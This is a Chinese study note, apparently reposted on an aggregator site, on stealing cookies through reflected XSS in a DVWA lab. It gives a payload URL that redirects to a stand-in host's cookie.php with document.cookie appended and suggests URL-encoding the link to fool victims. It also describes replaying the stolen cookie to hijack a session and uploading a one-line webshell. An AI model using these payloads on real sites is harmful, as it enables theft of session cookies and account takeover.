利用xss盗取cookie学习笔记 |
您所在的位置:网站首页 › 盗取cookie能做什么 › 利用xss盗取cookie学习笔记 |
利用xss盗取cookie
cookie介绍反射型xss盗取cookie利用cookie会话劫持劫持会话后的操作
cookie介绍
Cookie 是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段规定的时间,一旦超过规定的时间,该Cookie就会被系统清楚 服务器可以利用Cookie包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。 Cookie最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookie的功用。另一个重要应用场合是“购物车”之类的处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。 反射型xss盗取cookie url?uname=document.location=http://ip/cookie.php?cookie="+document.cookie location-->重定向 重定向到恶意url 将链接发送到用户,用户点击即触发XSS漏洞。同时可以使用URL编码来迷惑用户。 可以在dvwa中尝试一下 cookie.php代码 在dvwa对应界面 XSS(Reflected)(low) url/?name=document.location='http://127.0.0.1/对应文件夹/cookie.php?cookie="+document.cookie# 可以在cookie.php所在文件夹下发现cookie.txt 利用cookie会话劫持打开cookie.txt文件,找到Cookie值,访问目标站点,修改Cookie为Cookie.txt文件中的值 可抓包修改 从而直接进入index.php界面而不是login.php界面 劫持会话后的操作1、进入后台寻找上传点等进一步利用漏洞上传一句话webshell 例如虚拟机在使用桥接模式时(可以直接访问本机的靶场)在dvwa中上传一个一句话木马,就能连接到本机、可以直接访问本机文件(非常可怕的一个操作!!!). 2、修改配置,查找敏感信息等 |
今日新闻 |
点击排行 |
|
推荐新闻 |
图片新闻 |
|
专题文章 |
CopyRight 2018-2019 实验室设备网 版权所有 win10的实时保护怎么永久关闭 |